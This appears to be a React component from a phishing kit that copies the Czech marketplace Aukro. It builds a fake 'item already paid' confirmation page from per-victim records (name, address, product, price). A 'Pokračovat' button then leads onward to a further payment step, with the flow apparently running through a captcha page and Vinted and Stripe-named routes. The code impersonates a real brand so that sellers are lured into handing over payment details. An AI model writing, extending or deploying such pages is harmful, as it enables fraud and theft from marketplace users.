import React, { useEffect, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './AukroCzSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';
import { API_URL } from '../apiBase';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const FOOTER_SRC = `${process.env.PUBLIC_URL || ''}/cz-aukro/footer.png`;
const CZ_ITEM_PAID_BANNER = `${process.env.PUBLIC_URL || ''}/cz-shared/item-paid-banner.png`;
const AUKRO_STATUS_BANNER = `${process.env.PUBLIC_URL || ''}/cz-aukro/status-trust-banner.png`;
const AUKRO_LOGO_SRC = `${process.env.PUBLIC_URL || ''}/cz-aukro/logo.png`;

function resolvePhotoUrl(raw) {
  const u = (raw || '').trim();
  if (!u) return '';
  if (u.startsWith('http://') || u.startsWith('https://')) return u;
  const base = API_URL.replace(/\/$/, '');
  return `${base}/${u.replace(/^\//, '')}`;
}

function IconSearch() {
  return (
    <svg width="20" height="20" viewBox="0 0 24 24" aria-hidden>
      <path fill="currentColor" d="M15.5 14h-.79l-.28-.27A6.471 6.471 0 0016 9.5 6.5 6.5 0 109.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 4 11.01 4 8s3.01-6 6.5-6S17 5.01 17 8s-3.01 6-6.5 6z" />
    </svg>
  );
}

function IconUser() {
  return (
    <svg width="22" height="22" viewBox="0 0 24 24" aria-hidden>
      <path fill="currentColor" d="M12 12c2.21 0 4-1.79 4-4s-1.79-4-4-4-4 1.79-4 4 1.79 4 4 4zm0 2c-2.67 0-8 1.34-8 4v2h16v-2c0-2.66-5.33-4-8-4z" />
    </svg>
  );
}

function IconEnvelope() {
  return (
    <svg width="20" height="20" viewBox="0 0 24 24" aria-hidden>
      <path fill="currentColor" d="M20 4H4c-1.1 0-2 .9-2 2v12c0 1.1.9 2 2 2h16c1.1 0 2-.9 2-2V6c0-1.1-.9-2-2-2zm0 4l-8 5-8-5V6l8 5 8-5v2z" />
    </svg>
  );
}

function IconHeart() {
  return (
    <svg width="20" height="20" viewBox="0 0 24 24" aria-hidden>
      <path fill="currentColor" d="M12 21.35l-1.45-1.32C5.4 15.36 2 12.28 2 8.5 2 5.42 4.42 3 7.5 3c1.74 0 3.41.81 4.5 2.09C13.09 3.81 14.76 3 16.5 3 19.58 3 22 5.42 22 8.5c0 3.78-3.4 6.86-8.55 11.54L12 21.35z" />
    </svg>
  );
}

function IconCart() {
  return (
    <svg width="20" height="20" viewBox="0 0 24 24" aria-hidden>
      <path fill="currentColor" d="M7 18c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zM1 2v2h2l3.6 7.59-1.35 2.45c-.15.28-.25.61-.25.96 0 1.1.9 2 2 2h12v-2H7.42c-.14 0-.25-.11-.25-.25l.03-.12L8.1 13h7.45c.75 0 1.41-.41 1.75-1.03L21.7 4H5.21l-.94-2H1zm16 16c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2z" />
    </svg>
  );
}

function IconCopy() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" aria-hidden>
      <path
        fill="currentColor"
        d="M16 1H4c-1.1 0-2 .9-2 2v14h2V3h12V1zm3 4H8c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h11c1.1 0 2-.9 2-2V7c0-1.1-.9-2-2-2zm0 16H8V7h11v14z"
      />
    </svg>
  );
}

function IconMenu() {
  return (
    <svg width="16" height="16" viewBox="0 0 24 24" aria-hidden style={{ marginRight: 6, verticalAlign: 'middle' }}>
      <path fill="currentColor" d="M3 6h18v2H3V6zm0 5h18v2H3v-2zm0 5h18v2H3v-2z" />
    </svg>
  );
}

/**
 * Aukro (CZ) — potvrzení platby, čeština, Kč → index2 (VintedStripe2).
 * Tok: VintedStripe1 (captcha) → success → index2.
 */
function AukroCzSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [imgFailed, setImgFailed] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  useEffect(() => {
    setImgFailed(false);
  }, [pageData?.photo_url]);

  const countryCode = (pageData?.country_code || 'CZ').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'CZK';
  const sym = getSymbol(currencyCode);

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  })();

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(priceNumber.toFixed(0))
        : String(priceNumber);

  const amountLine = priceText === '—' ? `— ${sym}` : `${priceText} ${sym}`;

  const fn = (pageData?.first_name || '').trim();
  const ln = (pageData?.last_name || '').trim();
  const fullName = [fn, ln].filter(Boolean).join(' ') || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const productName = (pageData?.product_name || '').trim() || '—';
  const rawPhoto = (pageData?.photo_url || '').trim();
  const photoSrc = resolvePhotoUrl(rawPhoto);
  const showPlaceholder = !photoSrc || imgFailed;

  const orderRef =
    (pageData?.page_code && String(pageData.page_code)) || pageCode || '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const copyText = (text) => {
    if (!text || text === '—') return;
    if (navigator.clipboard?.writeText) {
      navigator.clipboard.writeText(text).catch(() => {});
    }
  };

  if (loading && pageCode) {
    return (
      <div className="auk-wrap">
        <div className="auk-loading">Načítání…</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="auk-wrap">
      <header className="auk-top">
        <div className="auk-top-inner">
          <a href="#/" className="auk-logo" aria-label="Aukro">
            <img src={AUKRO_LOGO_SRC} alt="Aukro" className="auk-logo-img" decoding="async" />
          </a>
          <div className="auk-search-row">
            <input className="auk-search-input" readOnly placeholder="Hledat na Aukru" />
            <select className="auk-search-cat" aria-label="Kategorie" disabled defaultValue="all">
              <option value="all">Všechny kategorie</option>
            </select>
            <button type="button" className="auk-search-btn" aria-label="Hledat">
              <IconSearch />
            </button>
          </div>
          <div className="auk-tools">
            <button type="button" className="auk-tool-btn" title="Moje Aukro" aria-label="Moje Aukro">
              <IconUser />
            </button>
            <button type="button" className="auk-tool-btn" aria-label="Zprávy">
              <IconEnvelope />
            </button>
            <button type="button" className="auk-tool-btn" aria-label="Oblíbené">
              <IconHeart />
            </button>
            <button type="button" className="auk-tool-btn" aria-label="Košík">
              <IconCart />
            </button>
          </div>
          <button type="button" className="auk-prodat">
            Prodat
          </button>
        </div>
      </header>

      <nav className="auk-subnav" aria-label="Sekce">
        <div className="auk-subnav-inner">
          <a href="#/">
            <IconMenu />
            Vyberte si kategorii
          </a>
          <a href="#/">Žhavé aukce</a>
          <a href="#/">Do 300 Kč</a>
          <a href="#/">Od 1 Kč</a>
          <a href="#/">Končící aukce</a>
          <a href="#/">Nejlepší prodejci</a>
          <span className="auk-subnav-help" aria-hidden>
            ?
          </span>
        </div>
      </nav>

      <section className="auk-status" aria-label="Stav objednávky">
        <img
          className="auk-status-banner-img"
          src={AUKRO_STATUS_BANNER}
          alt="Během chvíle obdržíte e-mailem potvrzení. Jediný inzertní portál, který chrání své kupující."
          decoding="async"
        />
      </section>

      <main className="auk-main">
        <div className="auk-card">
          <img
            className="auk-paid-banner-img"
            src={CZ_ITEM_PAID_BANNER}
            alt="Vaše položka byla vydána. Kupující již za objednávku zaplatil."
            decoding="async"
          />
          <h1 className="auk-card-title">Položka již zaplacena</h1>

          <div className="auk-item-row">
            {showPlaceholder ? (
              <div className="auk-thumb auk-thumb-ph" aria-hidden>
                foto
              </div>
            ) : (
              <img
                className="auk-thumb"
                src={photoSrc}
                alt=""
                onError={() => setImgFailed(true)}
              />
            )}
            <div className="auk-item-mid">
              <div className="auk-item-name">{productName}</div>
            </div>
            <div className="auk-item-price">{amountLine}</div>
          </div>

          <h2 className="auk-section-label">Platební údaje</h2>
          <div className="auk-detail">
            <div className="auk-detail-label">Jméno</div>
            <div className="auk-detail-value">{fullName}</div>
          </div>
          <div className="auk-detail">
            <div className="auk-detail-label">Adresa</div>
            <div className="auk-detail-value">{address}</div>
          </div>
          <div className="auk-detail">
            <div className="auk-detail-label">Položka již zaplacena</div>
            <div className="auk-paid-row">
              <svg className="auk-coin" width="22" height="22" viewBox="0 0 24 24" aria-hidden>
                <circle cx="12" cy="12" r="10" fill="#c9a227" stroke="#a68419" strokeWidth="1" />
                <text x="12" y="15" textAnchor="middle" fill="#fff" fontSize="9" fontWeight="700">
                  A
                </text>
              </svg>
              <span>Platba přes Aukro</span>
            </div>
          </div>

          <div className="auk-totals">
            <h2 className="auk-section-label">Platební údaje</h2>
            <div className="auk-copy-row auk-copy-row--big">
              <span className="auk-big-price">{amountLine}</span>
              <button
                type="button"
                className="auk-copy-btn"
                aria-label="Kopírovat částku"
                onClick={() => copyText(amountLine)}
              >
                <IconCopy />
              </button>
            </div>
            <div className="auk-copy-row auk-copy-row--id">
              <span>{orderRef}</span>
              <button
                type="button"
                className="auk-copy-btn"
                aria-label="Kopírovat číslo objednávky"
                onClick={() => copyText(orderRef)}
              >
                <IconCopy />
              </button>
            </div>
          </div>

          <p className="auk-online-label">Platba on-line:</p>
          <Link className="auk-cta" to={index2Path}>
            Pokračovat
          </Link>
        </div>
      </main>

      <img className="auk-footer-img" src={FOOTER_SRC} alt="" />

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default AukroCzSuccess;
